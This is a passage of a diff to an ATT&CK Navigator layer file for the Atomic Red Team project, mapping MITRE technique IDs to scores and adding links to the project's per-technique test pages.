@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"tech
niqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004",
"score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1072","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"tec
hniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"technique
ID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"tec
hniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":
true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techn
iqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atom
ic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1
021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","s
core":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","scor
e":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"ht
tps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":
true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"
